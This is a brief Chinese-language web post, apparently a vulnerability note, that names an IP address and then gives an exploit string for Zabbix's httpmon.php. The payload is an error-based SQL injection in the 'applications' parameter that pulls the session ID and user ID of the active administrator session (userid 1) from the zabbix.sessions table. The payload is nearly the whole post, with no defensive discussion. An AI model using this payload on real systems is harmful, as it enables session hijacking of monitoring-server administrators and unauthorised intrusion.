http://183.136.160.228
直接上EXP:
httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid=1 LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
阅读:100578 | 评论:0 | 标签:注入
姓名:
邮箱:
网址:
验证码: